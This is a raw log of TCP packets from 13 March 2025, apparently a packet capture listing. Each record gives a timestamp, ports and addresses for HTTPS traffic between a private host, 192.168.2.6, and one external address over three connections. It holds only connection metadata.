Mar 13, 2025 10:50:34.847254038 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.848813057 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.848848104 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.848889112 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.848896980 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.848921061 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.882671118 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.882725000 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.882788897 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.882800102 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.882837057 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.885252953 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.885294914 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.885324955 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.885332108 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.885370970 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.885421038 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.885471106 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.889306068 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.889352083 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.889405966 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.889414072 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.889453888 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.889504910 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.889508963 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.922780037 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.922835112 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.922868013 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.922885895 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.922914982 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.929805994 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.929840088 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.929893017 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.929903030 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.929929018 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.929930925 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.930033922 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.931854963 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.931900024 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.931932926 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.931941986 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.931971073 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.931986094 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.932532072 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.933769941 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.933808088 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.933846951 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.933852911 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.933887005 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.933939934 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.934242010 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.934261084 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:39.986068964 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:39.986110926 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:39.986182928 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:39.986510038 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:39.986526012 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:42.032975912 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:42.035060883 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:42.035082102 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:42.878753901 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:42.909506083 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:42.909526110 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:42.909594059 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:42.909622908 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:42.909681082 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.082412958 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.082444906 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.082489967 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.082511902 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.082523108 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.082748890 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.088104963 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.117232084 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.117254019 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.117309093 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.117326021 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.117363930 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.122808933 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.122884989 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.122901917 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.140317917 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.140363932 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.140429020 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.140441895 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.140501976 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.175004005 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.175028086 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.175095081 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.175107956 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.175118923 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.175733089 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.222568035 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.269448996 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.318753958 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.318766117 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.318810940 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.318867922 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.318867922 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.318886995 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.318929911 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.321211100 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.334233999 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.334256887 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.334311008 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.334322929 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.334362984 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.349747896 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.349793911 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.349873066 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.349873066 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.349888086 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.365191936 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.365232944 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.365279913 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.365291119 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.365336895 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.380606890 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.380650997 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.380695105 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.380706072 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.380753040 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.380753040 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.417633057 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.417653084 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.417695999 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.417716026 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.417728901 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.417782068 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.472515106 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.495795965 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.495809078 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.495851040 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.495884895 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.495887995 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.495899916 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.495912075 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.495939970 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.527354956 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.527374983 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.527462959 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.527492046 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.534238100 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.534245968 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.534271002 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.534301996 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.534327030 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.534359932 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.534374952 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.543608904 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.543649912 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.543658972 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.543689013 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.543719053 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.543730021 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.543761015 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.543790102 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.548908949 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.548924923 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.549005985 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.549017906 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.549105883 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.550075054 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.592772007 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.592789888 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.592861891 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.592876911 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.592911005 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.599556923 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.599576950 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.599611998 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.599630117 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.599638939 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.599711895 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.606682062 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.606697083 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.606749058 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.606756926 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.606854916 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.613516092 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.613533974 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.613581896 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.613588095 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.613620996 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.620407104 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.620424032 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.620469093 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.620479107 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.620506048 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.627321005 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.627338886 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.627435923 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.627435923 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.627445936 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.634243011 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.634268999 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.634368896 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.634368896 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.634393930 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.675674915 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.675702095 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.677711010 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.677742004 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.677784920 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.677813053 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.677823067 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.677840948 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.707556963 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.707581043 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.707688093 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.707689047 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.707698107 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.727014065 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.727039099 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.727065086 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.727087975 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.727103949 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.727134943 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.745476007 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.745498896 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.745527983 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.745599985 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.745614052 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.745656967 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.763933897 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.763952017 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.763981104 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.764107943 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.764107943 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.764130116 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.785285950 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.785304070 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.785334110 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.785407066 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.785425901 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.785461903 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.800448895 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.800491095 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.800509930 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.800549030 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.800559998 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.800585985 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.817753077 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.817768097 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.817815065 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.817852020 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.817890882 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.817890882 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.817913055 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.817990065 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.831600904 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.831633091 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.831846952 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.831868887 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.832325935 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.832664967 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.846510887 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.846534967 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.846653938 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.846653938 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.846664906 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.860358000 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.860383034 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.860466957 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.860476017 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.860523939 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.877608061 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.877660990 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.877736092 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.877736092 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.877753019 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.887227058 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.887274027 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.887310982 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.887322903 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.887327909 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.887345076 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.887366056 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.887423038 CET	443	49695	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:43.887459040 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.887521982 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:43.888391972 CET	49695	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:44.130832911 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:44.130875111 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:44.131490946 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:44.131781101 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:44.131795883 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:46.325534105 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:46.338145018 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:46.338162899 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.118240118 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.160072088 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.190561056 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.190581083 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.190601110 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.190610886 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.190643072 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.190686941 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.190717936 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.190740108 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.190774918 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.358887911 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.358917952 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.358968019 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.358984947 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.359013081 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.359040976 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.401633978 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.401663065 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.401741028 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.401770115 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.401792049 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.408718109 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.408771992 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.408792973 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.444236040 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.444258928 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.444320917 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.444349051 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.488162041 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.488188028 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.536155939 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.621124029 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.621157885 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.621222019 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.621236086 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.621243000 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.621283054 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.621325016 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.621337891 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.621376991 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.621383905 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.636163950 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.636220932 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.636250019 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.636276960 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.636287928 CET	443	49700	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:47.636292934 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.636317968 CET	49700	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:47.636338949 CET	443	49700	3.5.237.40	192.168.2.6
